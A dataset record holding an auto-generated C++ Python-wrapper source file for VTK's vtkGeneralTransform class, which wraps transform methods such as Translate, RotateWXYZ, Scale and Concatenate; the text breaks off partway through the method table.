blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
247
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 4
111
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
58
| visit_date
timestamp[ns]date 2015-07-25 18:16:41
2023-09-06 10:45:08
| revision_date
timestamp[ns]date 1970-01-14 14:03:36
2023-09-06 06:22:19
| committer_date
timestamp[ns]date 1970-01-14 14:03:36
2023-09-06 06:22:19
| github_id
int64 3.89k
689M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 25
values | gha_event_created_at
timestamp[ns]date 2012-06-07 00:51:45
2023-09-14 21:58:52
⌀ | gha_created_at
timestamp[ns]date 2008-03-27 23:40:48
2023-08-24 19:49:39
⌀ | gha_language
stringclasses 159
values | src_encoding
stringclasses 34
values | language
stringclasses 1
value | is_vendor
bool 1
class | is_generated
bool 2
classes | length_bytes
int64 7
10.5M
| extension
stringclasses 111
values | filename
stringlengths 1
195
| text
stringlengths 7
10.5M
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2ca4eb0e1da4d0a84d444a89599fd630dabcde3b
|
a2206795a05877f83ac561e482e7b41772b22da8
|
/Source/PV/build/VTK/Wrapping/Python/vtkGeneralTransformPython.cxx
|
14e09b5c91f697f4355ffbeee76c8c46c9cf532b
|
[] |
no_license
|
supreethms1809/mpas-insitu
|
5578d465602feb4d6b239a22912c33918c7bb1c3
|
701644bcdae771e6878736cb6f49ccd2eb38b36e
|
refs/heads/master
| 2020-03-25T16:47:29.316814
| 2018-08-08T02:00:13
| 2018-08-08T02:00:13
| 143,947,446
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 34,407
|
cxx
|
vtkGeneralTransformPython.cxx
|
// python wrapper for vtkGeneralTransform
//
#define VTK_WRAPPING_CXX
#define VTK_STREAMS_FWD_ONLY
#include "vtkPythonArgs.h"
#include "vtkPythonOverload.h"
#include "vtkConfigure.h"
#include <vtksys/ios/sstream>
#include "vtkIndent.h"
#include "vtkGeneralTransform.h"
#if defined(VTK_BUILD_SHARED_LIBS)
# define VTK_PYTHON_EXPORT VTK_ABI_EXPORT
# define VTK_PYTHON_IMPORT VTK_ABI_IMPORT
#else
# define VTK_PYTHON_EXPORT VTK_ABI_EXPORT
# define VTK_PYTHON_IMPORT VTK_ABI_EXPORT
#endif
extern "C" { VTK_PYTHON_EXPORT void PyVTKAddFile_vtkGeneralTransform(PyObject *, const char *); }
extern "C" { VTK_PYTHON_EXPORT PyObject *PyVTKClass_vtkGeneralTransformNew(const char *); }
#ifndef DECLARED_PyVTKClass_vtkAbstractTransformNew
extern "C" { PyObject *PyVTKClass_vtkAbstractTransformNew(const char *); }
#define DECLARED_PyVTKClass_vtkAbstractTransformNew
#endif
static const char **PyvtkGeneralTransform_Doc();
static PyObject *
PyvtkGeneralTransform_GetClassName(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "GetClassName");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
const char *tempr = (ap.IsBound() ?
op->GetClassName() :
op->vtkGeneralTransform::GetClassName());
if (!ap.ErrorOccurred())
{
result = ap.BuildValue(tempr);
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_IsA(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "IsA");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
char *temp0 = NULL;
PyObject *result = NULL;
if (op && ap.CheckArgCount(1) &&
ap.GetValue(temp0))
{
int tempr = (ap.IsBound() ?
op->IsA(temp0) :
op->vtkGeneralTransform::IsA(temp0));
if (!ap.ErrorOccurred())
{
result = ap.BuildValue(tempr);
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_NewInstance(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "NewInstance");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
vtkGeneralTransform *tempr = (ap.IsBound() ?
op->NewInstance() :
op->vtkGeneralTransform::NewInstance());
if (!ap.ErrorOccurred())
{
result = ap.BuildVTKObject(tempr);
if (result && PyVTKObject_Check(result))
{
PyVTKObject_GetObject(result)->UnRegister(0);
PyVTKObject_SetFlag(result, VTK_PYTHON_IGNORE_UNREGISTER, 1);
}
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_SafeDownCast(PyObject *, PyObject *args)
{
vtkPythonArgs ap(args, "SafeDownCast");
vtkObject *temp0 = NULL;
PyObject *result = NULL;
if (ap.CheckArgCount(1) &&
ap.GetVTKObject(temp0, "vtkObject"))
{
vtkGeneralTransform *tempr = vtkGeneralTransform::SafeDownCast(temp0);
if (!ap.ErrorOccurred())
{
result = ap.BuildVTKObject(tempr);
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_Identity(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "Identity");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
if (ap.IsBound())
{
op->Identity();
}
else
{
op->vtkGeneralTransform::Identity();
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_Inverse(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "Inverse");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
if (ap.IsBound())
{
op->Inverse();
}
else
{
op->vtkGeneralTransform::Inverse();
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_Translate_s1(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "Translate");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
double temp0;
double temp1;
double temp2;
PyObject *result = NULL;
if (op && ap.CheckArgCount(3) &&
ap.GetValue(temp0) &&
ap.GetValue(temp1) &&
ap.GetValue(temp2))
{
if (ap.IsBound())
{
op->Translate(temp0, temp1, temp2);
}
else
{
op->vtkGeneralTransform::Translate(temp0, temp1, temp2);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_Translate_s2(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "Translate");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
double temp0[3];
const int size0 = 3;
PyObject *result = NULL;
if (op && ap.CheckArgCount(1) &&
ap.GetArray(temp0, size0))
{
if (ap.IsBound())
{
op->Translate(temp0);
}
else
{
op->vtkGeneralTransform::Translate(temp0);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_Translate(PyObject *self, PyObject *args)
{
int nargs = vtkPythonArgs::GetArgCount(self, args);
switch(nargs)
{
case 3:
return PyvtkGeneralTransform_Translate_s1(self, args);
case 1:
return PyvtkGeneralTransform_Translate_s2(self, args);
}
vtkPythonArgs::ArgCountError(nargs, "Translate");
return NULL;
}
static PyObject *
PyvtkGeneralTransform_RotateWXYZ_s1(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "RotateWXYZ");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
double temp0;
double temp1;
double temp2;
double temp3;
PyObject *result = NULL;
if (op && ap.CheckArgCount(4) &&
ap.GetValue(temp0) &&
ap.GetValue(temp1) &&
ap.GetValue(temp2) &&
ap.GetValue(temp3))
{
if (ap.IsBound())
{
op->RotateWXYZ(temp0, temp1, temp2, temp3);
}
else
{
op->vtkGeneralTransform::RotateWXYZ(temp0, temp1, temp2, temp3);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_RotateWXYZ_s2(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "RotateWXYZ");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
double temp0;
double temp1[3];
const int size1 = 3;
PyObject *result = NULL;
if (op && ap.CheckArgCount(2) &&
ap.GetValue(temp0) &&
ap.GetArray(temp1, size1))
{
if (ap.IsBound())
{
op->RotateWXYZ(temp0, temp1);
}
else
{
op->vtkGeneralTransform::RotateWXYZ(temp0, temp1);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_RotateWXYZ(PyObject *self, PyObject *args)
{
int nargs = vtkPythonArgs::GetArgCount(self, args);
switch(nargs)
{
case 4:
return PyvtkGeneralTransform_RotateWXYZ_s1(self, args);
case 2:
return PyvtkGeneralTransform_RotateWXYZ_s2(self, args);
}
vtkPythonArgs::ArgCountError(nargs, "RotateWXYZ");
return NULL;
}
static PyObject *
PyvtkGeneralTransform_RotateX(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "RotateX");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
double temp0;
PyObject *result = NULL;
if (op && ap.CheckArgCount(1) &&
ap.GetValue(temp0))
{
if (ap.IsBound())
{
op->RotateX(temp0);
}
else
{
op->vtkGeneralTransform::RotateX(temp0);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_RotateY(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "RotateY");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
double temp0;
PyObject *result = NULL;
if (op && ap.CheckArgCount(1) &&
ap.GetValue(temp0))
{
if (ap.IsBound())
{
op->RotateY(temp0);
}
else
{
op->vtkGeneralTransform::RotateY(temp0);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_RotateZ(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "RotateZ");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
double temp0;
PyObject *result = NULL;
if (op && ap.CheckArgCount(1) &&
ap.GetValue(temp0))
{
if (ap.IsBound())
{
op->RotateZ(temp0);
}
else
{
op->vtkGeneralTransform::RotateZ(temp0);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_Scale_s1(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "Scale");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
double temp0;
double temp1;
double temp2;
PyObject *result = NULL;
if (op && ap.CheckArgCount(3) &&
ap.GetValue(temp0) &&
ap.GetValue(temp1) &&
ap.GetValue(temp2))
{
if (ap.IsBound())
{
op->Scale(temp0, temp1, temp2);
}
else
{
op->vtkGeneralTransform::Scale(temp0, temp1, temp2);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_Scale_s2(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "Scale");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
double temp0[3];
const int size0 = 3;
PyObject *result = NULL;
if (op && ap.CheckArgCount(1) &&
ap.GetArray(temp0, size0))
{
if (ap.IsBound())
{
op->Scale(temp0);
}
else
{
op->vtkGeneralTransform::Scale(temp0);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_Scale(PyObject *self, PyObject *args)
{
int nargs = vtkPythonArgs::GetArgCount(self, args);
switch(nargs)
{
case 3:
return PyvtkGeneralTransform_Scale_s1(self, args);
case 1:
return PyvtkGeneralTransform_Scale_s2(self, args);
}
vtkPythonArgs::ArgCountError(nargs, "Scale");
return NULL;
}
static PyObject *
PyvtkGeneralTransform_Concatenate_s1(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "Concatenate");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
vtkMatrix4x4 *temp0 = NULL;
PyObject *result = NULL;
if (op && ap.CheckArgCount(1) &&
ap.GetVTKObject(temp0, "vtkMatrix4x4"))
{
if (ap.IsBound())
{
op->Concatenate(temp0);
}
else
{
op->vtkGeneralTransform::Concatenate(temp0);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_Concatenate_s2(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "Concatenate");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
double temp0[16];
const int size0 = 16;
PyObject *result = NULL;
if (op && ap.CheckArgCount(1) &&
ap.GetArray(temp0, size0))
{
if (ap.IsBound())
{
op->Concatenate(temp0);
}
else
{
op->vtkGeneralTransform::Concatenate(temp0);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_Concatenate_s3(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "Concatenate");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
vtkAbstractTransform *temp0 = NULL;
PyObject *result = NULL;
if (op && ap.CheckArgCount(1) &&
ap.GetVTKObject(temp0, "vtkAbstractTransform"))
{
if (ap.IsBound())
{
op->Concatenate(temp0);
}
else
{
op->vtkGeneralTransform::Concatenate(temp0);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyMethodDef PyvtkGeneralTransform_Concatenate_Methods[] = {
{NULL, PyvtkGeneralTransform_Concatenate_s1, METH_VARARGS,
(char*)"@O *vtkMatrix4x4"},
{NULL, PyvtkGeneralTransform_Concatenate_s2, METH_VARARGS,
(char*)"@O *d"},
{NULL, PyvtkGeneralTransform_Concatenate_s3, METH_VARARGS,
(char*)"@O *vtkAbstractTransform"},
{NULL, NULL, 0, NULL}
};
static PyObject *
PyvtkGeneralTransform_Concatenate(PyObject *self, PyObject *args)
{
PyMethodDef *methods = PyvtkGeneralTransform_Concatenate_Methods;
int nargs = vtkPythonArgs::GetArgCount(self, args);
switch(nargs)
{
case 1:
return vtkPythonOverload::CallMethod(methods, self, args);
}
vtkPythonArgs::ArgCountError(nargs, "Concatenate");
return NULL;
}
static PyObject *
PyvtkGeneralTransform_PreMultiply(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "PreMultiply");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
if (ap.IsBound())
{
op->PreMultiply();
}
else
{
op->vtkGeneralTransform::PreMultiply();
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_PostMultiply(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "PostMultiply");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
if (ap.IsBound())
{
op->PostMultiply();
}
else
{
op->vtkGeneralTransform::PostMultiply();
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_GetNumberOfConcatenatedTransforms(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "GetNumberOfConcatenatedTransforms");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
int tempr = (ap.IsBound() ?
op->GetNumberOfConcatenatedTransforms() :
op->vtkGeneralTransform::GetNumberOfConcatenatedTransforms());
if (!ap.ErrorOccurred())
{
result = ap.BuildValue(tempr);
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_GetConcatenatedTransform(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "GetConcatenatedTransform");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
int temp0;
PyObject *result = NULL;
if (op && ap.CheckArgCount(1) &&
ap.GetValue(temp0))
{
vtkAbstractTransform *tempr = (ap.IsBound() ?
op->GetConcatenatedTransform(temp0) :
op->vtkGeneralTransform::GetConcatenatedTransform(temp0));
if (!ap.ErrorOccurred())
{
result = ap.BuildVTKObject(tempr);
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_SetInput(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "SetInput");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
vtkAbstractTransform *temp0 = NULL;
PyObject *result = NULL;
if (op && ap.CheckArgCount(1) &&
ap.GetVTKObject(temp0, "vtkAbstractTransform"))
{
if (ap.IsBound())
{
op->SetInput(temp0);
}
else
{
op->vtkGeneralTransform::SetInput(temp0);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_GetInput(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "GetInput");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
vtkAbstractTransform *tempr = (ap.IsBound() ?
op->GetInput() :
op->vtkGeneralTransform::GetInput());
if (!ap.ErrorOccurred())
{
result = ap.BuildVTKObject(tempr);
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_GetInverseFlag(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "GetInverseFlag");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
int tempr = (ap.IsBound() ?
op->GetInverseFlag() :
op->vtkGeneralTransform::GetInverseFlag());
if (!ap.ErrorOccurred())
{
result = ap.BuildValue(tempr);
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_Push(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "Push");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
if (ap.IsBound())
{
op->Push();
}
else
{
op->vtkGeneralTransform::Push();
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_Pop(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "Pop");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
if (ap.IsBound())
{
op->Pop();
}
else
{
op->vtkGeneralTransform::Pop();
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_InternalTransformPoint(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "InternalTransformPoint");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
double temp0[3];
const int size0 = 3;
double temp1[3];
double save1[3];
const int size1 = 3;
PyObject *result = NULL;
if (op && ap.CheckArgCount(2) &&
ap.GetArray(temp0, size0) &&
ap.GetArray(temp1, size1))
{
ap.SaveArray(temp1, save1, size1);
if (ap.IsBound())
{
op->InternalTransformPoint(temp0, temp1);
}
else
{
op->vtkGeneralTransform::InternalTransformPoint(temp0, temp1);
}
if (ap.ArrayHasChanged(temp1, save1, size1) &&
!ap.ErrorOccurred())
{
ap.SetArray(1, temp1, size1);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_InternalTransformDerivative(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "InternalTransformDerivative");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
double temp0[3];
const int size0 = 3;
double temp1[3];
double save1[3];
const int size1 = 3;
double temp2[3][3];
double save2[3][3];
static int size2[2] = { 3, 3 };
PyObject *result = NULL;
if (op && ap.CheckArgCount(3) &&
ap.GetArray(temp0, size0) &&
ap.GetArray(temp1, size1) &&
ap.GetNArray(*temp2, 2, size2))
{
ap.SaveArray(temp1, save1, size1);
ap.SaveArray(*temp2, *save2, size2[0]*size2[1]);
if (ap.IsBound())
{
op->InternalTransformDerivative(temp0, temp1, temp2);
}
else
{
op->vtkGeneralTransform::InternalTransformDerivative(temp0, temp1, temp2);
}
if (ap.ArrayHasChanged(temp1, save1, size1) &&
!ap.ErrorOccurred())
{
ap.SetArray(1, temp1, size1);
}
if (ap.ArrayHasChanged(*temp2, *save2, size2[0]*size2[1]) &&
!ap.ErrorOccurred())
{
ap.SetNArray(2, *temp2, 2, size2);
}
if (!ap.ErrorOccurred())
{
result = ap.BuildNone();
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_CircuitCheck(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "CircuitCheck");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
vtkAbstractTransform *temp0 = NULL;
PyObject *result = NULL;
if (op && ap.CheckArgCount(1) &&
ap.GetVTKObject(temp0, "vtkAbstractTransform"))
{
int tempr = (ap.IsBound() ?
op->CircuitCheck(temp0) :
op->vtkGeneralTransform::CircuitCheck(temp0));
if (!ap.ErrorOccurred())
{
result = ap.BuildValue(tempr);
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_MakeTransform(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "MakeTransform");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
vtkAbstractTransform *tempr = (ap.IsBound() ?
op->MakeTransform() :
op->vtkGeneralTransform::MakeTransform());
if (!ap.ErrorOccurred())
{
result = ap.BuildVTKObject(tempr);
if (result && PyVTKObject_Check(result))
{
PyVTKObject_GetObject(result)->UnRegister(0);
PyVTKObject_SetFlag(result, VTK_PYTHON_IGNORE_UNREGISTER, 1);
}
}
}
return result;
}
static PyObject *
PyvtkGeneralTransform_GetMTime(PyObject *self, PyObject *args)
{
vtkPythonArgs ap(self, args, "GetMTime");
vtkObjectBase *vp = ap.GetSelfPointer(self, args);
vtkGeneralTransform *op = static_cast<vtkGeneralTransform *>(vp);
PyObject *result = NULL;
if (op && ap.CheckArgCount(0))
{
unsigned long tempr = (ap.IsBound() ?
op->GetMTime() :
op->vtkGeneralTransform::GetMTime());
if (!ap.ErrorOccurred())
{
result = ap.BuildValue(tempr);
}
}
return result;
}
static PyMethodDef PyvtkGeneralTransform_Methods[] = {
{(char*)"GetClassName", PyvtkGeneralTransform_GetClassName, METH_VARARGS,
(char*)"V.GetClassName() -> string\nC++: const char *GetClassName()\n\n"},
{(char*)"IsA", PyvtkGeneralTransform_IsA, METH_VARARGS,
(char*)"V.IsA(string) -> int\nC++: int IsA(const char *name)\n\n"},
{(char*)"NewInstance", PyvtkGeneralTransform_NewInstance, METH_VARARGS,
(char*)"V.NewInstance() -> vtkGeneralTransform\nC++: vtkGeneralTransform *NewInstance()\n\n"},
{(char*)"SafeDownCast", PyvtkGeneralTransform_SafeDownCast, METH_VARARGS | METH_STATIC,
(char*)"V.SafeDownCast(vtkObject) -> vtkGeneralTransform\nC++: vtkGeneralTransform *SafeDownCast(vtkObject* o)\n\n"},
{(char*)"Identity", PyvtkGeneralTransform_Identity, METH_VARARGS,
(char*)"V.Identity()\nC++: void Identity()\n\nSet this transformation to the identity transformation. If the\ntransform has an Input, then the transformation will be reset so\nthat it is the same as the Input.\n"},
{(char*)"Inverse", PyvtkGeneralTransform_Inverse, METH_VARARGS,
(char*)"V.Inverse()\nC++: void Inverse()\n\nInvert the transformation. This will also set a flag so that the\ntransformation will use the inverse of its Input, if an Input has\nbeen set.\n"},
{(char*)"Translate", PyvtkGeneralTransform_Translate, METH_VARARGS,
(char*)"V.Translate(float, float, float)\nC++: void Translate(double x, double y, double z)\nV.Translate((float, float, float))\nC++: void Translate(const double x[3])\n\nCreate a translation matrix and concatenate it with the current\ntransformation according to PreMultiply or PostMultiply\nsemantics.\n"},
{(char*)"RotateWXYZ", PyvtkGeneralTransform_RotateWXYZ, METH_VARARGS,
(char*)"V.RotateWXYZ(float, float, float, float)\nC++: void RotateWXYZ(double angle, double x, double y, double z)\nV.RotateWXYZ(float, (float, float, float))\nC++: void RotateWXYZ(double angle, const double axis[3])\n\nCreate a rotation matrix and concatenate it with the current\ntransformation according to PreMultiply or PostMultiply\nsemantics. The angle is in degrees, and (x,y,z) specifies the\naxis that the rotation will be performed around.\n"},
{(char*)"RotateX", PyvtkGeneralTransform_RotateX, METH_VARARGS,
(char*)"V.RotateX(float)\nC++: void RotateX(double angle)\n\nCreate a rotation matrix about the X, Y, or Z axis and\nconcatenate it with the current transformation according to\nPreMultiply or PostMultiply semantics. The angle is expressed in\ndegrees.\n"},
{(char*)"RotateY", PyvtkGeneralTransform_RotateY, METH_VARARGS,
(char*)"V.RotateY(float)\nC++: void RotateY(double angle)\n\nCreate a rotation matrix about the X, Y, or Z axis and\nconcatenate it with the current transformation according to\nPreMultiply or PostMultiply semantics. The angle is expressed in\ndegrees.\n"},
{(char*)"RotateZ", PyvtkGeneralTransform_RotateZ, METH_VARARGS,
(char*)"V.RotateZ(float)\nC++: void RotateZ(double angle)\n\nCreate a rotation matrix about the X, Y, or Z axis and\nconcatenate it with the current transformation according to\nPreMultiply or PostMultiply semantics. The angle is expressed in\ndegrees.\n"},
{(char*)"Scale", PyvtkGeneralTransform_Scale, METH_VARARGS,
(char*)"V.Scale(float, float, float)\nC++: void Scale(double x, double y, double z)\nV.Scale((float, float, float))\nC++: void Scale(const double s[3])\n\nCreate a scale matrix (i.e. set the diagonal elements to x, y, z)\nand concatenate it with the current transformation according to\nPreMultiply or PostMultiply semantics.\n"},
{(char*)"Concatenate", PyvtkGeneralTransform_Concatenate, METH_VARARGS,
(char*)"V.Concatenate(vtkMatrix4x4)\nC++: void Concatenate(vtkMatrix4x4 *matrix)\nV.Concatenate((float, float, float, float, float, float, float,\n float, float, float, float, float, float, float, float, float)\n )\nC++: void Concatenate(const double elements[16])\nV.Concatenate(vtkAbstractTransform)\nC++: void Concatenate(vtkAbstractTransform *transform)\n\nConcatenates the matrix with the current transformation according\nto PreMultiply or PostMultiply semantics.\n"},
{(char*)"PreMultiply", PyvtkGeneralTransform_PreMultiply, METH_VARARGS,
(char*)"V.PreMultiply()\nC++: void PreMultiply()\n\nSets the internal state of the transform to PreMultiply. All\nsubsequent operations will occur before those already represented\nin the current transformation. In homogeneous matrix notation, M\n= M*A where M is the current transformation matrix and A is the\napplied matrix. The default is PreMultiply.\n"},
{(char*)"PostMultiply", PyvtkGeneralTransform_PostMultiply, METH_VARARGS,
(char*)"V.PostMultiply()\nC++: void PostMultiply()\n\nSets the internal state of the transform to PostMultiply. All\nsubsequent operations will occur after those already represented\nin the current transformation. In homogeneous matrix notation, M\n= A*M where M is the current transformation matrix and A is the\napplied matrix. The default is PreMultiply.\n"},
{(char*)"GetNumberOfConcatenatedTransforms", PyvtkGeneralTransform_GetNumberOfConcatenatedTransforms, METH_VARARGS,
(char*)"V.GetNumberOfConcatenatedTransforms() -> int\nC++: int GetNumberOfConcatenatedTransforms()\n\nGet the total number of transformations that are linked into this\none via Concatenate() operations or via SetInput().\n"},
{(char*)"GetConcatenatedTransform", PyvtkGeneralTransform_GetConcatenatedTransform, METH_VARARGS,
(char*)"V.GetConcatenatedTransform(int) -> vtkAbstractTransform\nC++: vtkAbstractTransform *GetConcatenatedTransform(int i)\n\n"},
{(char*)"SetInput", PyvtkGeneralTransform_SetInput, METH_VARARGS,
